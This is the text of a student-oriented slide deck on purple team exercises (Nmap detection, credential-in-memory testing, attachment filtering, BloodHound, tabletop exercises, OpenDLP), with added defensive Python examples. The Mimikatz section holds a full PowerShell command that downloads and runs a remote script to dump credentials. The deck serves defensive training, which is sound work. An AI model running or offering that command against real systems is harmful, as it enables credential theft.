@haydnjohnson
Purple Team what, why, how, even
Students - Feel free to reach out to me and ask any questions. We gotta look after our own Canadians
Whoami
Haydn Johnson
Security Analyst | Manager | Purple Teamer
Points (points.com)
Talks: Bsides, Circle City Con, HackFest, SecTor.
NolaCon
Offsec, Purple Team, Gym??
http://www.slideshare.net/HaydnJohnson
I work here!
1.
Outline
give a summary of (something).
Outline
Terminology
- Security in General
- Red Team
- Blue Team
What is Purple Teaming
- Core concept
- Process
- Togetherness
Examples of Purple Teaming
- Nmap
- Mimikatz
- Attachment Testing
- Table Top
- BloodHound
- OpenDLP
Full disclosure
- Most slides taken from my Purple Team OWASP Austin Talk
- Re-adjusted for students
Security in general
What is this security thing?
No clear definition!
Many different parts of security
CIA Triangle
What is this security thing?
CONFIDENTIALITY
INTEGRITY
AVAILABILITY
What is this security thing?
Business only see: AVAILABILITY
What is this security thing?
Types of Jobs:
- Security Manager
- Intrusion Analyst
- Incident Responder
- Policy Analyst
- GRC / Audit
- Penetration Tester
- Red Teamer
- Exploit Developer
- Threat Intelligence
- + MANY MORE
Purple Team
OR
Questions / Career Discussion
1.
Terminology
What means what
https://www.mitre.org/sites/default/files/publications/pr_14-3929-cyber-exercise-playbook.pdf
Terminology
Terminology
Vulnerability Assessment Person - Run Vuln Scanner....hey client you suck
Penetration Tester - Metasploit / MSF PRO (FTW)...hey client you suck
Red Teaming - Phish, move laterally, find sensitive stuff, maybe custom implant...hey client you suck
Purple Teaming - You did all the above, but got to charge for an extra body and to tell the client how they suck in person
Terminology
Red Teaming - Red Team engagements are the full spectrum warfare of security assessments. In a red team engagement, the consultants attack the client organization using physical means, social engineering, and technological avenues.
From: http://winterspite.com/security/phrasing/
Terminology
From: http://winterspite.com/security/phrasing/
Red Teaming
From: Chris Nickerson Lares Consulting
Terminology
Blue Team
- Network defenders
- Support
- Firewalls | Blinky Boxes
- Responders
Terminology
Purple Team
- Working together to achieve the ultimate goal of making the organization more secure
- different threats & attacker mindset
- incident detection and response
- policy and procedures
- tuning of controls
2.
Purple Team
Process
what | how
Purple Team
- Conducting focused pentesting (up to Red Teaming) with clear training objectives for the Blue Team.
- It isn't a "can you get access to X" exercise, it is a "train the Blue Team on X" exercise. The pentesting activities are a means to conduct realistic training.
Purple Team
Primary result of the exercise is to create an intrusion event (aka get caught) to test instrumentation (host / network), validate detection processes and procedures, validate protections in place, force response procedures and post mortems.
Differs from Red Team where primary goal is to NOT get caught
Purple Team
- Togetherness
Attack / Defend
3.
Cyber Exercises
MITRE cyber exercise playbook
https://www.mitre.org/sites/default/files/publications/pr_14-3929-cyber-exercise-playbook.pdf
Events / Injects
Events - generally executed by the Red Team to elicit responses from the Blue Team in specific phases, focused on the objectives of the exercise.
Different Teams
within cyber exercises
Exercises - Teams
ECG | GREY | RED | BLUE
Exercises - Teams
Exercise Control Group
Take information from other teams and make decisions to ensure the exercise is controlled and reaches its goals.
ECG: IR Manager, Team Lead, VP
Exercises - Teams
Gray Team / Observers
Observe the Blue Team's reaction or non-reaction and report back to ECG.
Ongoing process
GREY: IR Manager, Team Lead, VP
Exercises - Teams
Phases
of cyber exercises
Phases of a Cyber Exercise
- Plan
- Execution
- Lessons Learned
Exercises - Planning
Preliminary Meeting -> Middle Meetings -> Final Meeting
Exercises - Planning
"By failing to prepare, you are preparing to fail." - Benjamin Franklin
Everything needs consideration, pros, cons and a plan!
1. Brainstorming
2. Action Items
3. Budget / Approval
Exercises - Planning
Each team needs to know the end goals (except Blue)
Red Team needs to know what injects and when.
Goals:
1. To prevent confusion
2. Finalize Objectives
3. Identify if training is required
4. Decide on Use Cases
Exercises - Ideas
Initial Weakness
New technology
New Team
Test assumption
Budget
Devil's advocate
Exercises - Ideas
https://github.com/aptnotes/data/blob/master/APTnotes.csv
Exercises - Execution
- Execution
- Go Time
- Observe, Change, Observe
Be Dynamic
Exercise flow between the Exercise Control Group, Red Team, Training Audience and Observers:
1. RT tasked with action
2. Execute inject / event
3. Collects information
4. Feedback to ECG
Exercises - Execution
What if no response?
No Alerts?
Exercise Control Group / Red Team / Training Audience / Observers
! Check for hackers.fu
! Check alert for mal.exe
Exercises - Lessons Learned
- What observations were made during the exercise.
- What went well, what didn't
- Positive and negative - constructive
Exercises - Lessons Learned
- Internally we need to prepare better
- Ensure findings are documented
- Think of more alternative tests
Exercises - Lessons Learned
Exercise | Good | Bad | Improvements | Follow-up
Exercises - Lessons Learned
Collect Information from everyone
Strengthen future exercises
Exercise Control Group / Red Team / Training Audience / Observers
4.
Example exercises
Using CKC & EKC
Nmap
Mimikatz
Malicious Attachment Testing
BloodHound
Tabletop Exercise
OpenDLP
Port Scanning Detection
Nmap
Example 1 - Nmap
# of People Required: 1
Level of knowledge required: Little
Documentation online: Many
Time to Test: Minimal
Disruption to Business: None
Example 1 - Nmap
Test if Nmap / port scans can be seen internally or externally
What do the alerts look like?
Example 1 - Nmap
Start Basic
Increase complexity
Fragmentation
Example 1 - Nmap
$END POINT SOLUTION catches Nmap
$EPS misses fragmentation / slow scans
Each workstation gives ALERT
Try with Avast, McAfee, Symantec etc
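An added example of the detection side of this exercise (not code from the deck): a sliding-window port-scan detector run over constructed firewall log lines. It shows why a short detection window catches a default-speed scan but misses a slow one, and how a longer window over the same log catches both. The log format, hosts, window lengths and thresholds are assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed log format (an assumption, not any product's): "<iso-time> src=<ip> dst=<ip> dport=<port>"
def parse(line):
    ts, rest = line.split(" ", 1)
    f = dict(kv.split("=") for kv in rest.split())
    return datetime.fromisoformat(ts), f["src"], f["dst"], int(f["dport"])

def detect_scans(lines, window, min_ports):
    """{src: (dst, distinct_ports)} for every source that hit >= min_ports distinct
    ports on one destination inside some sliding window of length `window`."""
    per_pair = defaultdict(list)
    for ts, src, dst, port in sorted(parse(l) for l in lines):
        per_pair[(src, dst)].append((ts, port))
    hits = {}
    for (src, dst), events in per_pair.items():
        start = 0
        for end in range(len(events)):
            while events[end][0] - events[start][0] > window:
                start += 1                      # slide the window forward
            ports = {p for _, p in events[start:end + 1]}
            if len(ports) >= min_ports:
                hits[src] = (dst, len(ports))
                break
    return hits

def make_log(src, dst, ports, t0, gap):
    return [f"{(t0 + i * gap).isoformat()} src={src} dst={dst} dport={p}"
            for i, p in enumerate(ports)]

T0 = datetime(2017, 10, 12, 9, 0, 0)
LOG = (make_log("10.0.0.5", "10.0.0.20", range(1, 41), T0, timedelta(milliseconds=50))  # default-speed scan
       + make_log("10.0.0.6", "10.0.0.20", range(1, 41), T0, timedelta(minutes=5))       # slow (-T0/-T1 style) scan
       + make_log("10.0.0.7", "10.0.0.20", [443] * 40, T0, timedelta(seconds=1)))        # busy but legitimate client

def short_window():   # what a 10-second endpoint rule sees: only the fast scan
    return detect_scans(LOG, timedelta(seconds=10), 20)

def long_window():    # a 4-hour window over the same log also surfaces the slow scan
    return detect_scans(LOG, timedelta(hours=4), 20)
```

The legitimate client never trips either rule because it only ever touches one port, which is the distinction a distinct-port threshold buys over a raw connection count.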
Example 1 - Nmap
https://nmap.org/book/man-bypass-firewalls-ids.html
Example 1 - Nmap
Why Nmap? APT won't use Nmap
- It is a start
- Simple & cheap
- Test current technology
Example 1 - PowerShell
Advancing the exercise
PowerShell Remoting
Mimikatz
Example 2- Credentials in Memory
# of People Required: 1-2
Level of knowledge required: Little
Documentation online: Many
Time to Test: Minimal
Disruption to Business: None
Example 2- Credentials in Memory
Helpdesk / Ops wants a secure way to remotely manage workstation(s).
RDP | VNC - no thanks
Want to use PowerShell Remoting because easier and secure
https://blog.netspi.com/powershell-remoting-cheatsheet/
Example 2- Credentials in Memory
Requirements
- Ease of use
- Secure
- Auditability
Research shows this is possible
Example 2- Credentials in Memory
Steps:
- Before PS-Remoting
- After PS-Remoting
Example 2- Credentials in Memory
- Need to know for sure
- Want to test credentials are safe
- See for self
Mimikatz comes in
Example 2- Credentials in Memory
Command Run:
powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds | Out-File pre.txt"
http://carnal0wnage.attackresearch.com/2013/10/dumping-domains-worth-of-passwords-with.html
Example 2- Credentials in Memory
Dumping credentials
Example 2- Credentials in Memory
PS-Remote
Example 2- Credentials in Memory
Compare
Example 2- Credentials in Memory
Success!
- Need to document
- Have justification to implement!
- Security gives sign off!
email filter
Malicious Attachment Testing
Example 3 - Malicious Attachment Testing
<Email> is great at filtering malicious emails, attachments etc.
We want to see what gets through to know what to expect
What could get through?
Example 3 - Malicious Attachment Testing
Malicious File Maker
@carnal0wnage
https://github.com/carnal0wnage/malicious_file_maker
Example 3 - Malicious Attachment Testing
Automates sending
AV Pop-Ups
Not script kiddie friendly
Some attachments you cannot send
Receiving file attachments
Example 3 - Malicious Attachment Testing
The goal:
- Confirm email attachment filtering
- Confirm attachments that bypass
- Document findings for reference
- Potential defenses / future steps
Example 3 - Malicious Attachment Testing
Which allows us:
- Potential tuning to block file types
- Research file types for use in the wild
- Identification of compensating controls
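An added example (not from the deck or the filter product it tests) of the "tuning to block file types" step: a small attachment policy that looks at the extension, at what the bytes actually are, and inside archives, run over constructed attachments of the kinds the exercise sends. The blocklist, magic numbers and verdict names are assumptions about what such a policy could contain.

```python
import io
import zipfile

# Policy constructed for this example (the real filter's rules are unknown)
BLOCKED_EXT = {".exe", ".scr", ".js", ".vbs", ".hta", ".ps1", ".jar", ".bat", ".cmd"}
MAGIC = [(b"MZ", "pe"), (b"PK\x03\x04", "zip"), (b"%PDF", "pdf"), (b"\xd0\xcf\x11\xe0", "ole")]

def sniff(data):
    """Identify content by its leading bytes, ignoring the filename entirely."""
    for magic, kind in MAGIC:
        if data.startswith(magic):
            return kind
    return "text" if data.isascii() else "unknown"

def extensions(name):
    return ["." + p for p in name.lower().split(".")[1:]]

def classify(name, data):
    """Return (verdict, reason) for one attachment."""
    exts = extensions(name)
    if exts and exts[-1] in BLOCKED_EXT:
        return "block", f"blocked extension {exts[-1]}"
    kind = sniff(data)
    if kind == "pe":                                   # a renamed .exe is still an .exe
        return "block", f"executable content disguised as {exts[-1] if exts else 'no extension'}"
    if kind == "zip":                                  # .zip, .docx/.docm, .jar all start this way
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            members = zf.namelist()
        if any(m.lower().endswith("vbaproject.bin") for m in members):
            return "quarantine", "Office document with VBA macro project"
        bad = [m for m in members if extensions(m) and extensions(m)[-1] in BLOCKED_EXT]
        if bad:
            return "block", "archive contains " + ", ".join(bad)
    return "allow", kind

def make_zip(names):
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for n in names:
            zf.writestr(n, b"x")
    return buf.getvalue()

# Constructed test attachments covering one case per rule
SAMPLES = {
    "report.pdf": b"%PDF-1.4 constructed",
    "invoice.txt": b"MZ\x90\x00" + b"\x00" * 60,
    "photo.jpg.exe": b"MZ\x90\x00",
    "tools.zip": make_zip(["readme.txt", "run.js"]),
    "memo.docm": make_zip(["[Content_Types].xml", "word/document.xml", "word/vbaProject.bin"]),
}

def run(samples=SAMPLES):
    return {n: classify(n, d) for n, d in samples.items()}
```

Comparing this table with what the real filter let through in the exercise is exactly the "confirm attachments that bypass" list from the previous slide.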
BloodHound
Domain Admin Paths
Example 4 - Domain Admin Paths
# of People Required: 1-2
Level of knowledge required: Enough to install the tool
Documentation online: Installation instructions
Time to Test: Minimal
Disruption to Business: Potential to pop alerts
Example 4 - Domain Admin Paths
Goals:
- Identify Domain Admins
- Identify derivative admins
- Weakness in the chain of trust
Example 4 - Domain Admin Paths
BloodHound command:
https://blog.stealthbits.com/attacking-active-directory-permissions-with-bloodhound/
https://wald0.com/?p=112
https://github.com/BloodHoundAD/BloodHound/wiki/Getting-started
Example 4 - Domain Admin Paths
Tested with helpdesk access
Example 4 - Domain Admin Paths
Mystery account SUPERHERO identified via ACLs
Example 4 - Domain Admin Paths
- Follow up on mystery account
- Create Ticket
- Does it require the access it has?
Test with a group that has less access
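What BloodHound does with the collected data is a shortest-path search over a graph of AD relationships. The following is an added example (not BloodHound's code) of that search over a constructed edge list that reproduces the story on these slides: a helpdesk account reaching Domain Admins through an ACL on a "SUPERHERO" account. The domain, hosts, accounts and edges are made up; the relationship names follow BloodHound's vocabulary.

```python
from collections import defaultdict, deque

DA = "DOMAIN ADMINS@CORP.LOCAL"

# Constructed edge list (subject, relationship, target); everything below is made up
EDGES = [
    ("HELPDESK1@CORP.LOCAL", "MemberOf", "HELPDESK@CORP.LOCAL"),
    ("HELPDESK@CORP.LOCAL", "AdminTo", "WS01.CORP.LOCAL"),
    ("WS01.CORP.LOCAL", "HasSession", "SUPERHERO@CORP.LOCAL"),
    ("HELPDESK@CORP.LOCAL", "GenericAll", "SUPERHERO@CORP.LOCAL"),   # the ACL weakness
    ("SUPERHERO@CORP.LOCAL", "MemberOf", DA),
    ("ALICE@CORP.LOCAL", "MemberOf", "MARKETING@CORP.LOCAL"),
    ("MARKETING@CORP.LOCAL", "AdminTo", "WS02.CORP.LOCAL"),
]

def build_graph(edges):
    graph = defaultdict(list)
    for subj, rel, target in edges:
        graph[subj].append((rel, target))
    return graph

def shortest_path(graph, start, goal):
    """Breadth-first search; returns [(node, relationship, node), ...] or None."""
    parent = {start: None}
    queue = deque([start])
    while queue:
        node = queue.popleft()
        if node == goal:
            break
        for rel, nxt in graph.get(node, []):
            if nxt not in parent:
                parent[nxt] = (node, rel)
                queue.append(nxt)
    if goal not in parent:
        return None
    path, node = [], goal
    while parent[node] is not None:
        prev, rel = parent[node]
        path.append((prev, rel, node))
        node = prev
    return path[::-1]

def derivative_admins(edges, goal=DA):
    """Every principal with some path to the goal group: the 'derivative admin' set."""
    graph = build_graph(edges)
    nodes = {s for s, _, _ in edges} | {t for _, _, t in edges}
    return sorted(n for n in nodes if n != goal and shortest_path(graph, n, goal))

def helpdesk_to_da():
    return shortest_path(build_graph(EDGES), "HELPDESK1@CORP.LOCAL", DA)
```

The ticket from the slide above maps onto the GenericAll edge: removing that one ACL (or the group membership it leads to) is what breaks the path, which is the "weakness in the chain of trust" the goals slide is after.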
Table Top Exercise
Example 4 - Table Top Exercise
# of People Required: Many
Level of knowledge required: Varied
Documentation online: Yes
Time to Test: Long term
Disruption to Business: 1 day +
Example 4 - Table Top Exercise
Goals:
- Raise awareness
- Practice before it happens
Example 4 - Table Top Exercise
Pre Hack
During
Post
https://www.sans.org/reading-room/whitepapers/analyst/killing-advanced-threats-tracks-intelligent-approach-attack-prevention-35302
Example 4 - Table Top Exercise
Pre Hack
$Group Threaten Company
https://www.sans.org/reading-room/whitepapers/analyst/killing-advanced-threats-tracks-intelligent-approach-attack-prevention-35302
Example 4 - Table Top Exercise
Response A
Example 4 - Table Top Exercise
Response B
Example 4 - Table Top Exercise
Security | C-Level | PR | IT
Example 4 - Table Top Exercise
Technical Response: IR, Hardening
Public Response: Disclosure, Insurance
Example 4 - Table Top Exercise
Do this for each stage:
- Pre Hack
- During
- Post Hack
OpenDLP
Lateral Movement
Example 5 - Lateral Movement
# of People Required: 1-2
Level of knowledge required: Ability to find network shares
Documentation online: Yes
Time to Test: Hours
Disruption to Business: Minimal
Example 5 - Lateral Movement
Goals:
- Is there sensitive information at rest?
- What data could be accessed on network shares?
Please note
- Exercises do not have to be offsec tool focused
- Attacker mindset is important
- Testing assumptions
Example 5 - Lateral Movement
OpenDLP
- Data Loss Prevention tool
- Identifies sensitive data at rest on thousands of systems
- Not easy to install
https://github.com/ezarko/opendlp
Example 5 - Lateral Movement
OpenDLP Video Reference
Bsides Cleveland 2017
Blue-Teamin' on a Budget [of Zero]
https://www.youtube.com/watch?v=77M0aO2F2fU
Example 5 - Lateral Movement
- Download OVA
- Transfer sc.exe from XP 32bit
- Install browser cert
- Start apache
- Connect
Example 5 - Lateral Movement
Issues with install:
- sc.exe 32bit
- Accessing web server
- Solution: XP
http://www.makeuseof.com/tag/download-windows-xp-for-free-and-legally-straight-from-microsoft-si/
Example 5 - Lateral Movement
Import cert
Example 5 - Lateral Movement
Looks like this
Example 5 - Lateral Movement
- PII
- Credit card data etc
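An added example (not OpenDLP's code) of the core of what a data-at-rest scan does with the shares it reaches: pattern-match candidate card numbers and SSNs, weed out false positives with the Luhn check, and report only masked values so the report itself does not become the next sensitive file. The share paths and file contents are constructed; the card number is the well-known Visa test number and the SSN is made up.

```python
import re

CARD_RX = re.compile(r"\b\d(?:[ -]?\d){12,18}\b")   # 13 to 19 digits, optional separators
SSN_RX = re.compile(r"\b\d{3}-\d{2}-\d{4}\b")

def luhn_ok(digits):
    """Luhn checksum, which drops serial numbers and IDs that merely look like cards."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:                      # every second digit from the right is doubled
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return total % 10 == 0

def scan_text(text):
    """Return (kind, masked_value) findings; only the last four digits are ever reported."""
    findings = []
    for m in CARD_RX.finditer(text):
        digits = re.sub(r"[ -]", "", m.group())
        if luhn_ok(digits):
            findings.append(("card", "*" * (len(digits) - 4) + digits[-4:]))
    for m in SSN_RX.finditer(text):
        findings.append(("ssn", "***-**-" + m.group()[-4:]))
    return findings

# Constructed share contents standing in for files found on network shares
SHARE = {
    r"\\fs01\finance\refunds.csv": "customer,card\nsmith,4111 1111 1111 1111\n",
    r"\\fs01\hr\onboarding.txt": "New starter SSN 123-45-6789, badge 7781",
    r"\\fs01\it\inventory.txt": "Switch serial 4111111111111112 rack 4",   # fails Luhn: not a card
    r"\\fs01\public\menu.txt": "Lunch: 11:30 - 13:00",
}

def scan_share(files=SHARE):
    """Files with at least one finding, the per-share report a DLP tool produces."""
    report = {}
    for path, text in files.items():
        hits = scan_text(text)
        if hits:
            report[path] = hits
    return report
```

The inventory file is the case worth noticing: a 16-digit serial that passes the regex but fails Luhn, which is the difference between a report the business reads and one it dismisses as noise.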
Example 5 - Lateral Movement
Report looks like:
Example 5 - Lateral Movement
- This is still a work in progress.
- Wondering how I can create a process out of it
Conclusion
5.
Career / Infosec
Stuff
Ask questions.
Open Forum
My Career in Depth
From Australia
Masters of I.T - infosec specialization
Internship @ Deloitte Australia
Graduate program @ Deloitte
Move to Deloitte Canada
Move to KPMG Canada
Move to Points
Social Media
Infosec Twitter
Infosec Twitter
General information
Feeling part of a community
Mentors / Mentees
Motivation
Speaking publicly
Speaking / Publicity
Local Bsides Toronto
CO submission to Circle City Con
CO Submission to HackFest
BsidesLV Mentee program (Proving grounds)
CO Submission to SecTor (Chris Gates mentoring)
Speaking / Publicity
Benefits
- Knowing your topic enough to speak
- Communication Skills
- Networking
- Speaking itself
Github
Github
- I sort of have one
- Lots of dead end projects
- Contributed to Gdog
GitHub
Benefits
- Shows more than a CV
- Contribute to known projects
- Little projects that are recorded
Questions
Career stuff
others
UOIT Purple Team - Student Edition 2017